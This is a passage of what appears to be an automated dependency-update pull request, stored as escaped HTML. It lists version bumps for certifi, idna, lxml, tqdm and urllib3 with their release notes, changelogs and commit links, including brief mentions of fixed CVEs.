1.9.0 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/292\"\u003e#292\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/124f4adf171e15cd9a91a8b6e0325ecc97be8fe1\"\u003e\u003ccode\u003e124f4ad\u003c/code\u003e\u003c/a\u003e 2024.06.02 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/291\"\u003e#291\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/c2196ce5d6ee675b27755a19948480a7823e2c6a\"\u003e\u003ccode\u003ec2196ce\u003c/code\u003e\u003c/a\u003e --- (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/290\"\u003e#290\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/fefdeec7588ff1c05214b85a552afcad5fdb51b2\"\u003e\u003ccode\u003efefdeec\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.4 to 4.1.5 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/289\"\u003e#289\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/3c5fb1560b826a7f83f1f9750173ff766492c9cf\"\u003e\u003ccode\u003e3c5fb15\u003c/code\u003e\u003c/a\u003e Bump actions/download-artifact from 4.1.6 to 4.1.7 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/286\"\u003e#286\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/4a9569a3eb58db8548536fc16c5c5c7af946a5b1\"\u003e\u003ccode\u003e4a9569a\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.2 to 4.1.4 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/287\"\u003e#287\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/1fc808626a895a916b1e4c2b63abae6c5eafdbe3\"\u003e\u003ccode\u003e1fc8086\u003c/code\u003e\u003c/a\u003e Bump peter-evans/create-pull-request from 6.0.4 to 6.0.5 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/288\"\u003e#288\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/certifi/python-certifi/compare/2020.04.05.1...2024.07.04\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `idna` from 2.9 to 3.7\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/kjd/idna/releases\"\u003eidna's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev3.7\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix issue where specially crafted inputs to encode() could take exceptionally long amount of time to process. [CVE-2024-3651]\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Guido Vranken for reporting the issue.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/kjd/idna/compare/v3.6...v3.7\"\u003ehttps://github.com/kjd/idna/compare/v3.6...v3.7\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/kjd/idna/blob/master/HISTORY.rst\"\u003eidna's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e3.7 (2024-04-11)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix issue where specially crafted inputs to encode() could\ntake exceptionally long amount of time to process. [CVE-2024-3651]\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Guido Vranken for reporting the issue.\u003c/p\u003e\n\u003cp\u003e3.6 (2023-11-25)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix regression to include tests in source distribution.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e3.5 (2023-11-24)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate to Unicode 15.1.0\u003c/li\u003e\n\u003cli\u003eString codec name is now \u0026quot;idna2008\u0026quot; as overriding the system codec\n\u0026quot;idna\u0026quot; was not working.\u003c/li\u003e\n\u003cli\u003eFix typing error for codec encoding\u003c/li\u003e\n\u003cli\u003e\u0026quot;setup.cfg\u0026quot; has been added for this release due to some downstream\nlack of adherence to PEP 517. Should be removed in a future release\nso please prepare accordingly.\u003c/li\u003e\n\u003cli\u003eRemoved reliance on a symlink for the \u0026quot;idna-data\u0026quot; tool to comport\nwith PEP 517 and the Python Packaging User Guide for sdist archives.\u003c/li\u003e\n\u003cli\u003eAdded security reporting protocol for project\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks Jon Ribbens, Diogo Teles Sant'Anna, Wu Tingfeng for contributions\nto this release.\u003c/p\u003e\n\u003cp\u003e3.4 (2022-09-14)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate to Unicode 15.0.0\u003c/li\u003e\n\u003cli\u003eMigrate to pyproject.toml for build information (PEP 621)\u003c/li\u003e\n\u003cli\u003eCorrect another instance where generic exception was raised instead of\nIDNAError for malformed input\u003c/li\u003e\n\u003cli\u003eSource distribution uses zeroized file ownership for improved\nreproducibility\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Seth Michael Larson for contributions to this release.\u003c/p\u003e\n\u003cp\u003e3.3 (2021-10-13)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate to Unicode 14.0.0\u003c/li\u003e\n\u003cli\u003eUpdate to in-line type annotations\u003c/li\u003e\n\u003cli\u003eThrow IDNAError exception correctly for some malformed input\u003c/li\u003e\n\u003cli\u003eAdvertise support for Python 3.10\u003c/li\u003e\n\u003cli\u003eImprove testing regime on Github\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/1d365e17e10d72d0b7876316fc7b9ca0eebdd38d\"\u003e\u003ccode\u003e1d365e1\u003c/code\u003e\u003c/a\u003e Release v3.7\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/c1b3154939907fab67c5754346afaebe165ce8e6\"\u003e\u003ccode\u003ec1b3154\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/172\"\u003e#172\u003c/a\u003e from kjd/optimize-contextj\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/0394ec76ff022813e770ba1fd89658790ea35623\"\u003e\u003ccode\u003e0394ec7\u003c/code\u003e\u003c/a\u003e Merge branch 'master' into optimize-contextj\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/cd58a23173d2b0a40b95ee680baf3e59e8d33966\"\u003e\u003ccode\u003ecd58a23\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/152\"\u003e#152\u003c/a\u003e from elliotwutingfeng/dev\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/5beb28b9dd77912c0dd656d8b0fdba3eb80222e7\"\u003e\u003ccode\u003e5beb28b\u003c/code\u003e\u003c/a\u003e More efficient resolution of joiner contexts\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/1b121483ed04d9576a1291758f537e1318cddc8b\"\u003e\u003ccode\u003e1b12148\u003c/code\u003e\u003c/a\u003e Update ossf/scorecard-action to v2.3.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/d516b874c3388047934938a500c7488d52c4e067\"\u003e\u003ccode\u003ed516b87\u003c/code\u003e\u003c/a\u003e Update Github actions/checkout to v4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/c095c75943413c75ebf8ac74179757031b7f80b7\"\u003e\u003ccode\u003ec095c75\u003c/code\u003e\u003c/a\u003e Merge branch 'master' into dev\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/60a0a4cb61ec6834d74306bd8a1fa46daac94c98\"\u003e\u003ccode\u003e60a0a4c\u003c/code\u003e\u003c/a\u003e Fix typo in GitHub Actions workflow key\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/5918a0ef8034379c2e409ae93ee11d24295bb201\"\u003e\u003ccode\u003e5918a0e\u003c/code\u003e\u003c/a\u003e Merge branch 'master' into dev\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/kjd/idna/compare/v2.9...v3.7\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `lxml` from 4.5.0 to 4.9.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/lxml/lxml/blob/master/CHANGES.txt\"\u003elxml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e4.9.1 (2022-07-01)\u003c/h1\u003e\n\u003ch2\u003eBugs fixed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eA crash was resolved when using \u003ccode\u003eiterwalk()\u003c/code\u003e (or \u003ccode\u003ecanonicalize()\u003c/code\u003e)\nafter parsing certain incorrect input.  Note that \u003ccode\u003eiterwalk()\u003c/code\u003e can crash\non \u003cem\u003evalid\u003c/em\u003e input parsed with the same parser \u003cem\u003eafter\u003c/em\u003e failing to parse the\nincorrect input.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e4.9.0 (2022-06-01)\u003c/h1\u003e\n\u003ch2\u003eBugs fixed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eGH#341: The mixin inheritance order in \u003ccode\u003elxml.html\u003c/code\u003e was corrected.\nPatch by xmo-odoo.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eOther changes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eBuilt with Cython 0.29.30 to adapt to changes in Python 3.11 and 3.12.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eWheels include zlib 1.2.12, libxml2 2.9.14 and libxslt 1.1.35\n(libxml2 2.9.12+ and libxslt 1.1.34 on Windows).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eGH#343: Windows-AArch64 build support in Visual Studio.\nPatch by Steve Dower.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e4.8.0 (2022-02-17)\u003c/h1\u003e\n\u003ch2\u003eFeatures added\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eGH#337: Path-like objects are now supported throughout the API instead of just strings.\nPatch by Henning Janssen.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eThe \u003ccode\u003eElementMaker\u003c/code\u003e now supports \u003ccode\u003eQName\u003c/code\u003e values as tags, which always override\nthe default namespace of the factory.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eBugs fixed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eGH#338: In lxml.objectify, the XSI float annotation \u0026quot;nan\u0026quot; and \u0026quot;inf\u0026quot; were spelled in\nlower case, whereas XML Schema datatypes define them as \u0026quot;NaN\u0026quot; and \u0026quot;INF\u0026quot; respectively.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lxml/lxml/commit/d01872ccdf7e1e5e825b6c6292b43e7d27ae5fc4\"\u003e\u003ccode\u003ed01872c\u003c/code\u003e\u003c/a\u003e Prevent parse failure in new test from leaking into later test runs.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lxml/lxml/commit/d65e63229e8958bc08344a85cd3f09ceeef933c3\"\u003e\u003ccode\u003ed65e632\u003c/code\u003e\u003c/a\u003e Prepare release of lxml 4.9.1.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lxml/lxml/commit/86368e9cf70a0ad23cccd5ee32de847149af0c6f\"\u003e\u003ccode\u003e86368e9\u003c/code\u003e\u003c/a\u003e Fix a crash when incorrect parser input occurs together with usages of iterwa...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lxml/lxml/commit/50c276412880c1a3dde8a6d6c909e3ed8ef47e43\"\u003e\u003ccode\u003e50c2764\u003c/code\u003e\u003c/a\u003e Delete unused Travis CI config and reference in docs (\u003ca href=\"https://redirect.github.com/lxml/lxml/issues/345\"\u003eGH-345\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lxml/lxml/commit/8f0bf2d158f2dd3f98d410c8a38fcd536fd11b53\"\u003e\u003ccode\u003e8f0bf2d\u003c/code\u003e\u003c/a\u003e Try to speed up the musllinux AArch64 build by splitting the different CPytho...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lxml/lxml/commit/b9f7074430594b95824059eef931dfbb27a7645e\"\u003e\u003ccode\u003eb9f7074\u003c/code\u003e\u003c/a\u003e Remove debug print from test.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lxml/lxml/commit/b224e0f69dde58425d1077e07d193d19d3f803a9\"\u003e\u003ccode\u003eb224e0f\u003c/code\u003e\u003c/a\u003e Try to install 'xz' in wheel builds, if available, since it's now needed to e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lxml/lxml/commit/897ebfa002fe5ec773ffe8851721047fedcc6928\"\u003e\u003ccode\u003e897ebfa\u003c/code\u003e\u003c/a\u003e Update macOS deployment target version from 10.14 to 10.15 since 10.14 starts...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lxml/lxml/commit/853c9e9cbf1c82d1ad3c096362372a048108905e\"\u003e\u003ccode\u003e853c9e9\u003c/code\u003e\u003c/a\u003e Prepare release of 4.9.0.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lxml/lxml/commit/d3f77e678a8394559331d27257714e8aa4b082f2\"\u003e\u003ccode\u003ed3f77e6\u003c/code\u003e\u003c/a\u003e Add a test for \u003ca href=\"https://bugs.launchpad.net/lxml/+bug/1965070\"\u003ehttps://bugs.launchpad.net/lxml/+bug/1965070\u003c/a\u003e leaving out the a...\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/lxml/lxml/compare/lxml-4.5.0...lxml-4.9.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `tqdm` from 4.46.0 to 4.66.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/tqdm/tqdm/releases\"\u003etqdm's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003etqdm v4.66.3 stable\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ecli\u003c/code\u003e: \u003ccode\u003eeval\u003c/code\u003e safety (fixes CVE-2024-34062, GHSA-g7vv-2v7x-gj9p)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003etqdm v4.66.2 stable\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003epandas\u003c/code\u003e: add \u003ccode\u003eDataFrame.progress_map\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/1549\"\u003e#1549\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003enotebook\u003c/code\u003e: fix HTML padding (\u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/1506\"\u003e#1506\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ekeras\u003c/code\u003e: fix resuming training when \u003ccode\u003everbose\u0026gt;=2\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/1508\"\u003e#1508\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix \u003ccode\u003eformat_num\u003c/code\u003e negative fractions missing leading zero (\u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/1548\"\u003e#1548\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix Python 3.12 \u003ccode\u003eDeprecationWarning\u003c/code\u003e on \u003ccode\u003eimport\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/1519\"\u003e#1519\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003elinting: use f-strings (\u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/1549\"\u003e#1549\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupdate tests (\u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/1549\"\u003e#1549\u003c/a\u003e)\n\u003cul\u003e\n\u003cli\u003efix \u003ccode\u003epandas\u003c/code\u003e warnings\u003c/li\u003e\n\u003cli\u003efix \u003ccode\u003easv\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/airspeed-velocity/asv/issues/1323\"\u003eairspeed-velocity/asv#1323\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix macos \u003ccode\u003enotebook\u003c/code\u003e docstring indentation\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eCI: bump actions (\u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/1549\"\u003e#1549\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003etqdm v4.66.1 stable\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix \u003ccode\u003eutils.envwrap\u003c/code\u003e types (\u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/1493\"\u003e#1493\u003c/a\u003e \u0026lt;- \u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/1491\"\u003e#1491\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/1320\"\u003e#1320\u003c/a\u003e \u0026lt;- \u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/966\"\u003e#966\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/1319\"\u003e#1319\u003c/a\u003e)\n\u003cul\u003e\n\u003cli\u003ee.g. cloudwatch \u0026amp; kubernetes workaround: \u003ccode\u003eexport TQDM_POSITION=-1\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edrop mentions of unsupported Python versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003etqdm v4.66.0 stable\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eenvironment variables to override defaults (\u003ccode\u003eTQDM_*\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/1491\"\u003e#1491\u003c/a\u003e \u0026lt;- \u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/1061\"\u003e#1061\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/950\"\u003e#950\u003c/a\u003e \u0026lt;- \u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/614\"\u003e#614\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/1318\"\u003e#1318\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/619\"\u003e#619\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/612\"\u003e#612\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/370\"\u003e#370\u003c/a\u003e)\n\u003cul\u003e\n\u003cli\u003ee.g. in CI jobs, \u003ccode\u003eexport TQDM_MININTERVAL=5\u003c/code\u003e to avoid log spam\u003c/li\u003e\n\u003cli\u003eadd tests \u0026amp; docs for \u003ccode\u003etqdm.utils.envwrap\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003efix \u0026amp; update CLI completion\u003c/li\u003e\n\u003cli\u003efix \u0026amp; update API docs\u003c/li\u003e\n\u003cli\u003eminor code tidy: replace \u003ccode\u003eos.path\u003c/code\u003e =\u0026gt; \u003ccode\u003epathlib.Path\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003efix docs image hosting\u003c/li\u003e\n\u003cli\u003erelease with CI bot account again (\u003ca href=\"https://redirect.github.com/cli/cli/issues/6680\"\u003ecli/cli#6680\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003etqdm v4.65.2 stable\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eexclude \u003ccode\u003eexamples\u003c/code\u003e from distributed wheel (\u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/1492\"\u003e#1492\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003etqdm v4.65.1 stable\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003emigrate \u003ccode\u003esetup.{cfg,py}\u003c/code\u003e =\u0026gt; \u003ccode\u003epyproject.toml\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/1490\"\u003e#1490\u003c/a\u003e)\n\u003cul\u003e\n\u003cli\u003efix \u003ccode\u003easv\u003c/code\u003e benchmarks\u003c/li\u003e\n\u003cli\u003eupdate docs\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003efix snap build (\u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/1490\"\u003e#1490\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix \u0026amp; update tests (\u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/1490\"\u003e#1490\u003c/a\u003e)\n\u003cul\u003e\n\u003cli\u003efix flaky notebook tests\u003c/li\u003e\n\u003cli\u003ebump \u003ccode\u003epre-commit\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003ebump workflow actions\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003etqdm v4.65.0 stable\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eadd Python 3.11 and drop Python 3.6 support (\u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/1439\"\u003e#1439\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/1419\"\u003e#1419\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/502\"\u003e#502\u003c/a\u003e \u0026lt;- \u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/720\"\u003e#720\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/620\"\u003e#620\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003emisc code \u0026amp; docs tidy\u003c/li\u003e\n\u003cli\u003efix \u0026amp; update CI workflows \u0026amp; tests\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003etqdm v4.64.1 stable\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tqdm/tqdm/commit/4e613f84ed2ae029559f539464df83fa91feb316\"\u003e\u003ccode\u003e4e613f8\u003c/code\u003e\u003c/a\u003e Merge pull request from GHSA-g7vv-2v7x-gj9p\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tqdm/tqdm/commit/b53348c73080b4edeb30b4823d1fa0d8d2c06721\"\u003e\u003ccode\u003eb53348c\u003c/code\u003e\u003c/a\u003e cli: eval safety\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tqdm/tqdm/commit/cc372d09dcd5a5eabdc6ed4cf365bdb0be004d44\"\u003e\u003ccode\u003ecc372d0\u003c/code\u003e\u003c/a\u003e bump version, merge pull request \u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/1549\"\u003e#1549\u003c/a\u003e from tqdm/devel\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tqdm/tqdm/commit/e9f0c05097dc167031575391d83240d37556f098\"\u003e\u003ccode\u003ee9f0c05\u003c/code\u003e\u003c/a\u003e use PyPI trusted publishing\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tqdm/tqdm/commit/7323d5bcc9b032d525f9d6468a9713f5be9c4174\"\u003e\u003ccode\u003e7323d5b\u003c/code\u003e\u003c/a\u003e slight makefile clean\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tqdm/tqdm/commit/5306125133d76e0f9326d747d29781fefe273c77\"\u003e\u003ccode\u003e5306125\u003c/code\u003e\u003c/a\u003e tests: bump pre-commit\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tqdm/tqdm/commit/4a6fd4f690a4add231f4bef601521ed9bee513fb\"\u003e\u003ccode\u003e4a6fd4f\u003c/code\u003e\u003c/a\u003e fix datetime.utcfromtimestamp py3.12 warning (\u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/1519\"\u003e#1519\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tqdm/tqdm/commit/6f13759f4a0e1047a09732e72f6d07e44d3e6855\"\u003e\u003ccode\u003e6f13759\u003c/code\u003e\u003c/a\u003e tests: fix macos notebook indentation\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tqdm/tqdm/commit/3abcd2ac90ecb01ac7f64071af600f803eab6a21\"\u003e\u003ccode\u003e3abcd2a\u003c/code\u003e\u003c/a\u003e tests: fix asv\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tqdm/tqdm/commit/a4d15c8e2f6c7322c1a1cd1d845927f037281da1\"\u003e\u003ccode\u003ea4d15c8\u003c/code\u003e\u003c/a\u003e tests: fix pandas warnings\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/tqdm/tqdm/compare/v4.46.0...v4.66.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `urllib3` from 1.25.9 to 1.26.19\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/urllib3/urllib3/releases\"\u003eurllib3's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e1.26.19\u003c/h2\u003e\n\u003ch2\u003e🚀 urllib3 is fundraising for HTTP/2 support\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://sethmlarson.dev/urllib3-is-fundraising-for-http2-support\"\u003eurllib3 is raising ~$40,000 USD\u003c/a\u003e to release HTTP/2 support and ensure long-term sustainable maintenance of the project after a sharp decline in financial support for 2023. If your company or organization uses Python and would benefit from HTTP/2 support in Requests, pip, cloud SDKs, and thousands of other projects \u003ca href=\"https://opencollective.com/urllib3\"\u003eplease consider contributing financially\u003c/a\u003e to ensure HTTP/2 support is developed sustainably and maintained for the long-haul.\u003c/p\u003e\n\u003cp\u003eThank you for your support.\u003c/p\u003e\n\u003ch2\u003eChanges\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded the \u003ccode\u003eProxy-Authorization\u003c/code\u003e header to the list of headers to strip from requests when redirecting to a different host. As before, different headers can be set via \u003ccode\u003eRetry.remove_headers_on_redirect\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/urllib3/urllib3/compare/1.26.18...1.26.19\"\u003ehttps://github.com/urllib3/urllib3/compare/1.26.18...1.26.19\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eNote that due to an issue with our release automation, no \u003ccode\u003e multiple.intoto.jsonl\u003c/code\u003e file is available for this 